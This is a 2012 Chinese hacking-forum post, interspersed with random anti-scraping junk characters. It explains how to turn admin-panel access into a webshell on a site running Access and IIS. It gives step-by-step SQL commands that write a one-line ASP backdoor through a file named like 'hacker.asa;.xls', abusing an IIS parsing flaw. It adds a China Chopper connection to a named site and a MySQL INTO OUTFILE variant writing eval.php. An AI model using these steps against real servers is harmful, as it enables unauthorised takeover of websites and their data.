找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2001|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
7 H% o( u9 o( O8 _webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
7 ^! s+ T6 q. H: ~2 m* i( X1 N文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
! M# Z) T6 g  b; \+ c+ I) c) ^然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:# `' l/ g+ r: V. \! T0 C" I
1.create table cmd (a varchar(50))
( D$ W( ]7 T5 m$ M2.insert into cmd (a) values (‘‘)% V' G6 f- h4 F1 t
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
6 K) m2 y% C  I% G(把表cmd的内容导出为物理路径的一个EXCEL文件)0 T3 k  |8 i  x1 N; r. j6 B
4.drop table cmd
. M% }; l4 A1 F  O! i: {利用IIS的BUG成功拿到了WEBSHELL。1 K$ d- |5 {4 h7 n* t

/ s& }- X3 v# _. L1 M0 c! J直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话  K+ [8 S0 T( a3 L2 y$ k
% k8 h0 `1 B9 \  }; Q
  SQL语句意思解释:
: T4 i3 F, E2 O3 u  第一句7 `# C& F+ `; l; c' Y: P
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50) b% Z3 T. \9 _3 T# h

7 N& v) W6 Q" h. \  第二句0 z7 ^0 n& w, l; G/ g, [
  在表cmd的a字段插入一句话木马
7 d7 u( s9 [7 m3 h) U1 }  第三句
7 Y; M* A/ C. u6 e( l1 u  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件5 J: F/ J2 S7 C7 p2 Y

1 m* P2 }1 p4 `  第四句
7 Q* |$ b; q/ o2 |9 B  P  删除建立的cmd表
8 Q/ m6 z6 [, N2 `4 a* K. N  h; Y4 }) b
  以下内容为测试:
* j% L! K) U  K5 H7 {9 G  Access利用后台SQL执行命令功能导出WebShell:" T$ f9 B1 s& z  C" X9 C. B1 f' }: Z
  这个更简单:
7 r/ f: d; Z  l+ Y9 N  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
/ f& @3 S2 d4 C& p4 b( u0 Q5 K* I  或者
  f) |3 h+ B* Q* j+ E  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
: [3 G" s% B, r) |* h; o
" ?" ^' J0 Y, n5 N* p  后台有执行SQL语句功能(vote为已知表段). W# g$ A  [4 m7 W) s  K4 }
  希望对大家有所帮助拿shell的又一个思路( t9 A3 c8 a9 D- |! s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表